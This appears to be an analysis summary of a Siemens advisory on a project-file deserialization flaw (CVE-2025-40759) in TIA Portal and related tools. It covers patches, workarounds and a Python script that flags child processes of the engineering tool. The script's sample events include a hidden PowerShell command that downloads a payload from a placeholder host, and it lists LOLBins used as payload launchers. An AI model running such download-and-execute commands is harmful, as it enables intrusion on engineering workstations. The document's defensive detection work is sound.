Full Report
Affected products do not properly sanitize user-controllable input when parsing project files. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. Siemens has released new versions for several affected products and recommends updating to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet, available.
Analysis Summary
# Vulnerability: Deserialization and Type Confusion in Siemens Engineering Platforms
## CVE Details
- **CVE ID:** CVE-2025-40759
- **CVSS Score:**
- CVSS v4.0: **8.5 (High)**
- CVSS v3.1: **7.8 (High)**
- **CWE:** CWE-502 (Deserialization of Untrusted Data)
## Affected Systems
- **SIMATIC STEP 7 V17 / WinCC V17:** All versions < V17 Update 9
- **SIMATIC S7-PLCSIM V17:** All versions
- **SIMOCODE ES V17:** All versions
- **SIMOTION SCOUT TIA V5.4:** All versions
- **SINAMICS Startdrive V17:** All versions
- **SIRIUS Safety ES V17 / Soft Starter ES V17:** All versions
- **TIA Portal Cloud V17:** All versions
- **TIA Portal V18:** All versions (as of the current advisory status)
## Vulnerability Description
Affected Siemens engineering platforms do not properly sanitize user-controllable input when parsing project files. During deserialization of the untrusted data contained in a project file, a crafted object can be handled as if it were of a different type than the one actually allocated (a type confusion). The resulting memory corruption allows execution of arbitrary code in the context of the affected application, i.e. with the privileges of the user who opened the project file.
## Exploitation
- **Status:** Not currently reported as exploited in the wild; the advisory references no public proof of concept.
- **Complexity:** Low. No preconditions beyond a crafted project file are needed; the CVSS v3.1 score of 7.8 matches the vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.
- **Attack Vector:** Local with user interaction required: a user must open a specially crafted project file, typically delivered by e-mail, network share or removable media.
## Impact
- **Confidentiality:** High
- **Integrity:** High
- **Availability:** High
## Remediation
### Patches
Siemens recommends updating to the following versions where fixes are available:
- **SIMATIC STEP 7 V17 / WinCC V17:** Update to V17 Update 9 or later.
- **TIA Portal V20:** listed in the advisory history as having a fix available.
### Workarounds
For products where no fix is currently planned or available (e.g., S7-PLCSIM V17, SIMOCODE ES V17):
- **Restrict File Sources:** Only open project files from trusted and known sources.
- **Principle of Least Privilege:** Run the engineering software under a standard (non-administrative) user account wherever the installation permits it. Code executed through this flaw runs with the privileges of the user who opened the project file, so a restricted account bounds the impact.
- **External Media Controls:** Apply strict policies for transferring project files via USB or network shares.
## Detection
- **Indicators of Compromise:** Crashes of TIA Portal or associated engineering software when a specific project file is opened, which may indicate a failed exploitation attempt; unexpected outbound network connections from the engineering workstation shortly after a project file is imported.
- **Detection Methods:** Use endpoint detection and response (EDR) tooling or process-creation telemetry (Sysmon Event ID 1, Windows Security Event ID 4688) to flag child processes spawned by TIA Portal or associated engineering software. Treat command interpreters, PowerShell and script hosts launched by the engineering tool as high priority, and baseline any other children before alerting on them.
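The parent/child check described above, as an added example that is not part of the advisory or of any Siemens or EDR product: it classifies Sysmon Event ID 1-style process-creation records (`ParentImage`, `ParentCommandLine`, `Image`, `CommandLine`) and reports every child of the engineering tool, raising an alert for known payload launchers and a lower-severity "review" entry for anything else so the analyst can baseline legitimate helpers. Two assumptions are made for the example: that TIA Portal's main process is `Siemens.Automation.Portal.exe`, and that project files carry a `.apNN` extension (`.ap17` for V17); both should be confirmed against your own installation. The events in `SAMPLE_EVENTS` are constructed, and `ExampleHelper.exe` is a hypothetical child process, not a real Siemens binary.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Parent images that identify the engineering tool. Assumption for this example:
# TIA Portal's main process is Siemens.Automation.Portal.exe; confirm the exact
# image names on your workstations before deploying the rule.
ENGINEERING_PARENTS = {"siemens.automation.portal.exe"}

# Interpreters and LOLBins an engineering tool has no reason to launch while a
# project is open; these are the usual first-stage payload launchers.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Assumption: TIA Portal projects are *.apNN files (.ap17 for V17). Used only to
# pull the opened project path out of the parent's command line for context.
PROJECT_FILE_RE = re.compile(r'"([^"]+\.ap\d{2})"|(\S+\.ap\d{2})', re.IGNORECASE)


@dataclass
class Finding:
    severity: str            # "alert" for a known launcher, "review" otherwise
    child: str
    parent: str
    project_file: Optional[str]
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def project_file_from(cmdline: str) -> Optional[str]:
    """Return the first *.apNN path in a command line, quoted or bare."""
    m = PROJECT_FILE_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def evaluate(event: dict) -> Optional[Finding]:
    """Classify one process-creation event; None when the parent is not an
    engineering tool. Every child of the tool is surfaced: known launchers as
    an alert, anything else for baselining, because a payload may also spawn a
    legitimately named helper rather than cmd.exe."""
    parent = _basename(event.get("ParentImage", ""))
    if parent not in ENGINEERING_PARENTS:
        return None
    child = _basename(event.get("Image", ""))
    severity = "alert" if child in SUSPICIOUS_CHILDREN else "review"
    return Finding(severity, child, parent,
                   project_file_from(event.get("ParentCommandLine", "")),
                   event.get("CommandLine", ""))


def triage_events(events: Iterable[dict]) -> List[Finding]:
    return [f for f in (evaluate(e) for e in events) if f is not None]


# Constructed sample events in Sysmon Event ID 1 field names; not real telemetry.
SAMPLE_EVENTS = [
    {   # engineering tool with a project open spawns cmd.exe -> alert
        "ParentImage": r"C:\Program Files\Siemens\Automation\Portal V17\Bin\Siemens.Automation.Portal.exe",
        "ParentCommandLine": r'"C:\Program Files\Siemens\Automation\Portal V17\Bin\Siemens.Automation.Portal.exe" "D:\Projects\Line 3\Line3.ap17"',
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c powershell.exe -w hidden -nop -c "iwr http://example.invalid/p"',
    },
    {   # cmd.exe from Explorer: unrelated to the engineering tool -> ignored
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe",
    },
    {   # hypothetical helper launched by the tool -> review for baselining
        "ParentImage": r"C:\Program Files\Siemens\Automation\Portal V17\Bin\Siemens.Automation.Portal.exe",
        "ParentCommandLine": r'"C:\Program Files\Siemens\Automation\Portal V17\Bin\Siemens.Automation.Portal.exe" D:\Projects\Pump.ap17',
        "Image": r"C:\Program Files\Siemens\Automation\Portal V17\Bin\ExampleHelper.exe",
        "CommandLine": r"ExampleHelper.exe",
    },
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.parent} -> {f.child} (project: {f.project_file}) :: {f.command_line}")
```

Feed the function the parsed `EventData` of Sysmon Event ID 1 records (or map 4688's `ParentProcessName`/`NewProcessName` onto the same keys). Tune `SUSPICIOUS_CHILDREN` and promote recurring "review" children to an allowlist only after confirming they are part of the installed Siemens software.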
## References
- **Vendor Advisory:** hxxps://cert-portal[.]siemens[.]com/productcert/html/ssa-493396[.]html
- **Siemens ProductCERT:** hxxps://www[.]siemens[.]com/cert/advisories
- **Patch Download (V17 Update 9):** hxxps://support[.]industry[.]siemens[.]com/cs/ww/en/view/109784441/